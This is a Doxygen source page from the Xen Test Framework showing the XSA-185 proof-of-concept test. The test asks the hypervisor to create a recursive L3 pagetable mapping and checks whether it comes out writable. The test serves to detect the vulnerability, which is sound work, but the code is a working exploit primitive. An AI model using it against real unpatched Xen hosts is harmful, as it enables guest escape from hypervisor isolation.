docs/xtf/xsa-185_2main_8c_source.html

#include <xtf.h>


const char test_title[] = "XSA-185 PoC";


void test_main(void)

{

    paddr_t cr3_paddr = (paddr_t)xen_cr3_to_pfn(read_cr3()) << PAGE_SHIFT;


     /*

      * Force the use of slot 2.

      *

      * Slots 0 and 3 are definitely in use, and we only have 4 to choose

      * from.  Lets hope that nothing import is using the 3rd GB of virtual

      * address space.

      */

    unsigned long map_slot = 2;


    mmu_update_t mu =

        {

            .ptr = cr3_paddr + (map_slot * PAE_PTE_SIZE),

            .val = cr3_paddr | PF_SYM(AD, U, P),

        };


    printk("  Creating recursive l3 mapping\n");

    if ( hypercall_mmu_update(&mu, 1, NULL, DOMID_SELF) )

    {

        printk("  Attempt to create recursive l3 mapping was blocked\n");

        return xtf_success("Not vulerable to XSA-185\n");

    }


    /* Construct a pointer in the linear map to l3 table. */

    intpte_t *l3_linear = _p(map_slot << L3_PT_SHIFT |

                             map_slot << L2_PT_SHIFT |

                             map_slot << L1_PT_SHIFT);


    if ( l3_linear[map_slot] & PF_SYM(RW) )

        return xtf_failure("Fail: l3 linear mapping is RW\n");

    else

        return xtf_error("Error: l3 linear mapping is not RW, but wasn't blocked\n");

}


/*

 * Local variables:

 * mode: C

 * c-file-style: "BSD"

 * c-basic-offset: 4

 * tab-width: 4

 * indent-tabs-mode: nil

 * End:

 */

read_cr3
static unsigned long read_cr3(void)
Definition: lib.h:243

printk
void printk(const char *fmt,...)
Definition: console.c:134

test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:110

test_title
const char test_title[]
The title of the test.
Definition: main.c:24

hypercall_mmu_update
static long hypercall_mmu_update(const mmu_update_t reqs[], unsigned int count, unsigned int *done, unsigned int foreigndom)
Definition: hypercall.h:60

_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48

PAE_PTE_SIZE
#define PAE_PTE_SIZE
PAE pagetable entries are 64 bits wide.
Definition: page-pae.h:14

L2_PT_SHIFT
#define L2_PT_SHIFT
Definition: page.h:67

paddr_t
uint64_t paddr_t
Definition: page.h:96

PAGE_SHIFT
#define PAGE_SHIFT
Definition: page.h:10

intpte_t
unsigned long intpte_t
Definition: page.h:152

L1_PT_SHIFT
#define L1_PT_SHIFT
Definition: page.h:66

xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94

xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80

xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38

NULL
#define NULL
Definition: stddef.h:12

mmu_update
Definition: xen.h:245

mmu_update::ptr
uint64_t ptr
Definition: xen.h:249

PF_SYM
#define PF_SYM(...)
Create pagetable entry flags based on mnemonics.
Definition: symbolic-const.h:108

xen_cr3_to_pfn
static unsigned int xen_cr3_to_pfn(unsigned int cr3)
Definition: xen-x86_32.h:72

DOMID_SELF
#define DOMID_SELF
Definition: xen.h:70